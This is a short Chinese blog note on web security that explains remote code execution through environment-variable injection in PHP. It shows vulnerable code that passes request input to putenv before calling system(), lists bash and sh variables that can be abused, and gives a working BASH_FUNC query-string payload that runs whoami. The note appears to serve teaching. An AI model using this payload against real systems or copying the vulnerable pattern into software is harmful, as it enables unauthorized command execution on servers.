web安全-环境变量注入

发表于2024-02-22|更新于2024-02-22|知识点

|字数总计:181|阅读时长:1分钟|阅读量:

详解:https://cloud.tencent.com/developer/article/2354373

利用环境变量注入RCE

对于这样的代码来进行RCE

<?php
foreach($_REQUEST['envs'] as $key => $val) {
    putenv("{$key}={$val}");
}
//... 一些其他代码
system('echo hello');
?>

环境变量利用:

BASH_ENV：可以在bash -c的时候注入任意命令
ENV：可以在sh -i -c的时候注入任意命令
PS1：可以在sh或bash交互式环境下执行任意命令
PROMPT_COMMAND：可以在bash交互式环境下执行任意命令
BASH_FUNC_xxx%%：可以在bash -c或sh -c的时候执行任意命令

对于刚才的代码,就可以这样来执行whoami命令(bash环境下):

1	?envs[BASH_FUNC_echo%%]=()%20{%20whoami;%20}

文章作者: Hades

文章链接: https://hades-blog.github.io/2024/02/22/%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93-web%E5%AE%89%E5%85%A8-%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%B3%A8%E5%85%A5/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 YTM's Blog！

相关推荐

web安全-CSRF(跨站请求伪造)

web安全-Flask sessions伪造

web安全-NoSQL注入

web安全-Nodejs原型链污染

web安全-Java安全

web安全-php反序列化及pop链

评论

数据库加载中